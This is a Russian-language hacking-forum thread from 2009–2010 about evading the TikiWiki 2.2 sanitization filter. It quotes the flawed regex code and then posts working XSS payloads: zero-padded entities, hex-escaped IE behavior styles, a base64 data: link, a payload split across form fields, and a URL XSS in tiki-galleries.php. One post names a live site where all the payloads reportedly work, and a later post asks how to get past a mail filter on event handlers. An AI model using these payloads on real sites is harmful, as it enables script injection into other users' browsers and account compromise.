ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 27.02.2009, 16:42
Аватар для iliz
iliz
Новичок
Регистрация: 27.08.2007
Сообщений: 11
Провел на форуме:
35477

Репутация: 8
По умолчанию

проблема в том что они в скрипте санитизации приводят все не стандартные кодировки к стандартной и только затем составляют для каждого $ra отдельный динамичиский regexp с ключами //gi, поэтому не бачет...
но у меня всеж надежда не умирает , щас анализирую коды, пытаюсь найти выход...
 
Ответить с цитированием

  #12  
Старый 04.03.2009, 03:22
Аватар для LeverOne
LeverOne
Познающий
Регистрация: 22.02.2006
Сообщений: 67
Провел на форуме:
4155100

Репутация: 2033
По умолчанию

TikiWiki 2.2 CMS/Groupware XSS vulnerability


Неправильный кусок кода из файла sanitization.php

PHP код:
for ($i 0$i strlen($search); $i++) {
            
// ;? matches the ;, which is optional
            // 0{0,8} matches any padded zeros,
            // which are optional and go up to 8 chars
            // &#x0040 @ search for the hex values
            
$patterns[] = '/(&#[xX]0{0,8}'.dechex(ord($search[$i])).';?)/i';
            
$replacements[] = $search[$i];
            
// &#00064 @ 0{0,8} matches '0' zero to eight times
            // with a ;
            
$patterns[] = '/(&#0{0,8}'.ord($search[$i]).';?)/';
            
$replacements[] = $search[$i];
        } 
В Opera и FF ограничений по количеству опциональных нулей нет, поэтому если при кодировании используется хотя бы 9 нулей, фильтр считает, что перед ним другой символ.

активная XSS (Opera only)*

PHP код:
<img src="&#000000000106avascript:confirm(/lo/)"
*в различных полях невозможность использования этого способа вызвана дополнительной фильтрацией. Так, например, в личных сообщениях, либо тексте комментариев блога, если фильтр не определил закодированный символ, идет преобразование & --> &amp; Однако же в названиях и описаниях блогов этой допфильтрации нет.

активная XSS (IE only)

Код:
<img style="behavior:\75\72\6C\28\23\64\65\66\61\75\6C\74\23\74\69\6D\65\32\29;display:none" end=0 onend=confirm(/lo/)>
или

Код:
<img style="behavior:\75\72\6C\28\23\64\65\66\61\75\6C\74\23\74\69\6D\65\32\29;display:none" onbegin="confirm(/lo/)">
*пропуск событий HTML+Time2
*пропуск эскейп-последовательностей


пассивная XSS (Opera & FF)

Код:
<a href="data:text/html;base64, PHNjcmlwdD5hbGVydCgvbG8vKTwvc2NyaXB0Pg==">click me</a>

Проверка производилась на локально установленном движке в личных сообщениях и блогах, этого достаточно, чтобы увидеть практическую работу модуля sanitization.php. Дополнительная фильтрация в отдельных полях может быть обсуждена отдельно.

Также следует отметить неаккуратную работу фильтра со структурой тега. Весьма легко производится выход за пределы тега. Невнимание разработчиков можно объяснить тем, что за пределами тега существует такая же фильтрация, как и внутри него. Однако же фильтрация между полями на одной странице отсутствует, в силу чего можно составить код xss, берущий начало в одном поле, а заканчивающийся в другом.

Замечательное подтверждение вышесказанному сайтец http://lojban.org, основанный на tikiwiki 3.0beta. В форумных заголовках (title) сообщений проходят ВСЕ вышеописанные XSS.

Активная XSS уязвимость, основанная на нарушении структуры тега, может быть такая (IE only):
в заголовке форумного сообщения
Код:
<a style=`display:none;lo:expres/*;></a>
в теле форумного сообщения
Код:
[http://www.foo.com/lo*/sion(this.lo==true?true:confirm(/lo/,this.lo=true));`| ]

Последний раз редактировалось LeverOne; 27.06.2009 в 03:37.. Причина: уточнение
 
Ответить с цитированием

  #13  
Старый 04.03.2009, 11:29
Аватар для iliz
iliz
Новичок
Регистрация: 27.08.2007
Сообщений: 11
Провел на форуме:
35477

Репутация: 8
По умолчанию

хм.... вери интерестинг!
а я пока раскопал URL XSS в tiki-galleries.php который не подвержен фильтрации
tiki-galleries.php/>"><ScRipt>alert(666)</scRipt>
 
Ответить с цитированием

  #14  
Старый 06.03.2009, 15:06
Аватар для iliz
iliz
Новичок
Регистрация: 27.08.2007
Сообщений: 11
Провел на форуме:
35477

Репутация: 8
По умолчанию

Да, про base64 encoding совсем забыл... каюсь
с дивами и с нулями не бачет, видимо что-то он перекодирует, или еще что-то делает, после \75rl идет урезание
 
Ответить с цитированием

  #15  
Старый 06.03.2009, 15:28
Аватар для iliz
iliz
Новичок
Регистрация: 27.08.2007
Сообщений: 11
Провел на форуме:
35477

Репутация: 8
По умолчанию

сорри, запинается на # симовле...
 
Ответить с цитированием

  #16  
Старый 10.03.2009, 17:11
Аватар для iliz
iliz
Новичок
Регистрация: 27.08.2007
Сообщений: 11
Провел на форуме:
35477

Репутация: 8
По умолчанию

LeverOne да ты воистину гуру!
откуда столько тонкостей знаешь? (про нули например) Я чесно говоря до тебя не встречал, и не знал, такого
спасибо тебе громадно! жутко выручил!
 
Ответить с цитированием

  #17  
Старый 13.02.2010, 21:12
Аватар для SEKTOR3A
SEKTOR3A
Новичок
Регистрация: 02.05.2009
Сообщений: 18
Провел на форуме:
31604

Репутация: -3
По умолчанию

как использовать такую кодировку \75\72\6C\28\23\64\65\66\61\75\6C\74\23\7 4\69\6D\65\32\29

дайти ссылку плиз
 
Ответить с цитированием

  #18  
Старый 14.02.2010, 09:45
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от SEKTOR3A  
как использовать такую кодировку \75\72\6C\28\23\64\65\66\61\75\6C\74\23\7 4\69\6D\65\32\29

дайти ссылку плиз
HEX это.
 
Ответить с цитированием

  #19  
Старый 15.02.2010, 04:32
Аватар для SEKTOR3A
SEKTOR3A
Новичок
Регистрация: 02.05.2009
Сообщений: 18
Провел на форуме:
31604

Репутация: -3
По умолчанию

спс., возможно ли избавится от такого фильтра который сам после получения какого либо письма вписывает значение filtered-
и именно там где стоит onmouseover пробовал как -нить закодить но не вышло может есть на это какие -нить варианты
<a href="mail.html" filtered-onmouseover="alert('Your Message');return true;" target="_blank">Linked Text</a>

sps.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Энциклопедия уязвимых скриптов DIAgen Сценарии/CMF/СMS 401 17.06.2010 17:39
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
Защита информации против защиты данных dinar_007 Мировые новости 0 26.02.2006 20:02
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23
Ловушка для взломщика k00p3r Чужие Статьи 0 08.06.2005 16:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ